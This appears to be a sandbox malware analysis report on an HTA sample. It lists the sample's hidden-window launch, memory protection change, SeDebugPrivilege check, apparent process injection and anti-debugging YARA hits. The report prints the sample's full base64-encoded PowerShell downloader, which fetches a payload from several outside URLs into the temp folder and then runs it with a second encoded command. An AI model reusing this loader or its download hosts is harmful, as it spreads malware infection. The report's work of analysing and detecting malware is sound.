bABlAFAAbABlAHQAaABvAHIAYQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEQAZQBjAGEAbgBvAGwALgBlAHgAaQBnAGkAYgBsAGUAUABsAGUAdABoAG8AcgBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAEUAQQBHAFUAQQBZAHcAQgBoAEEARwA0AEEAYgB3AEIAcwBBAEMANABBAFoAUQBCADQAQQBHAGsAQQBaAHcAQgBwAEEARwBJAEEAYgBBAEIAbABBAEYAQQBBAGIAQQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEASABJAEEAWQBRAEEAcwBBAEUAMABBAGIAdwBCADAAQQBHAFEAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="

cmdline

powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVQBuAHAAbwBpAHMAbwBuAGUAZABQAHIAaQBuAGMAaQBwAGEAbABpAHQAaQBlAHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBoAG8AdABlAGwAbABvAHMAbQBpAHIAdABvAHMALgBjAG8AbQAvAHMAagBuAC8AUABRAGkAeQBOAGYAcgBtAFUAbQAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwA1AHgAeQBJAHQAYQA0AEoALABoAHQAdABwAHMAOgAvAC8AYwBpAHQAeQB0AGUAYwBoAC0AcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvADYATQBoADEAawAvAGIATABkAGQAbwBDADUAdwAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvAGkAdwBqAHYAVwBXAFEASwAxAEwAWABHACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAGYAdQBtAEIARQA0AGgAbABtADkALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBUADgAWABlAFUAVAByAGEALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AOQB2AFkAdABtAFoALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwAwADgAagBYAEIANABYADkAQgBGACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGcAaQBlAEEAbQBhAGsAZQBiAGUAIABpAG4AIAAkAFUAbgBwAG8AaQBzAG8AbgBlAGQAUAByAGkAbgBjAGkAcABhAGwAaQB0AGkAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABnAGkAZQBBAG0AYQBrAGUAYgBlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABEAGUAYwBhAG4AbwBsAC4AZQB4AGkAZwBpAGIAbABlAFAAbABlAHQAaABvAHIAYQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEQAZQBjAGEAbgBvAGwALgBlAHgAaQBnAGkAYgBsAGUAUABsAGUAdABoAG8AcgBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAEUAQQBHAFUAQQBZAHcAQgBoAEEARwA0AEEAYgB3AEIAcwBBAEMANABBAFoAUQBCADQAQQBHAGsAQQBaAHcAQgBwAEEARwBJAEEAYgBBAEIAbABBAEYAQQBBAGIAQQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEASABJAEEAWQBRAEEAcwBBAEUAMABBAGIAdwBCADAAQQBHAFEAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA=="

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 20, 2023, 11:16 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAVQBuAHAAbwBpAHMAbwBuAGUAZABQAHIAaQBuAGMAaQBwAGEAbABpAHQAaQBlAHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBoAG8AdABlAGwAbABvAHMAbQBpAHIAdABvAHMALgBjAG8AbQAvAHMAagBuAC8AUABRAGkAeQBOAGYAcgBtAFUAbQAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwA1AHgAeQBJAHQAYQA0AEoALABoAHQAdABwAHMAOgAvAC8AYwBpAHQAeQB0AGUAYwBoAC0AcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvADYATQBoADEAawAvAGIATABkAGQAbwBDADUAdwAsAGgAdAB0AHAAcwA6AC8ALwB6AGEAaQBuAGMAbwAuAG4AZQB0AC8ATwBkAE8AVQAvAGkAdwBqAHYAVwBXAFEASwAxAEwAWABHACwAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAGYAdQBtAEIARQA0AGgAbABtADkALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBUADgAWABlAFUAVAByAGEALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AOQB2AFkAdABtAFoALABoAHQAdABwAHMAOgAvAC8AZwBzAHMAYwBvAHIAcABvAHIAYQB0AGkAbwBuAGwAdABkAC4AYwBvAG0ALwBvAGsAUwBmAGoALwAwADgAagBYAEIANABYADkAQgBGACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFcAaQBkAGcAaQBlAEEAbQBhAGsAZQBiAGUAIABpAG4AIAAkAFUAbgBwAG8AaQBzAG8AbgBlAGQAUAByAGkAbgBjAGkAcABhAGwAaQB0AGkAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABXAGkAZABnAGkAZQBBAG0AYQBrAGUAYgBlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABEAGUAYwBhAG4AbwBsAC4AZQB4AGkAZwBpAGIAbABlAFAAbABlAHQAaABvAHIAYQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEQAZQBjAGEAbgBvAGwALgBlAHgAaQBnAGkAYgBsAGUAUABsAGUAdABoAG8AcgBhACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBRAEEAUgBRAEIATgBBAEYAQQBBAFgAQQBCAEUAQQBHAFUAQQBZAHcAQgBoAEEARwA0AEEAYgB3AEIAcwBBAEMANABBAFoAUQBCADQAQQBHAGsAQQBaAHcAQgBwAEEARwBJAEEAYgBBAEIAbABBAEYAQQBBAGIAQQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEASABJAEEAWQBRAEEAcwBBAEUAMABBAGIAdwBCADAAQQBHAFEAQQBPAHcAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADsAfQB9AA==" filepath: powershell	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 20, 2023, 11:16 a.m.	process_identifier: 940 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x02f70000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 20, 2023, 11:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 940 resumed a thread in remote process 2152
NtResumeThread April 20, 2023, 11:16 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2152	1	0	0

Sbiqfcpir.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All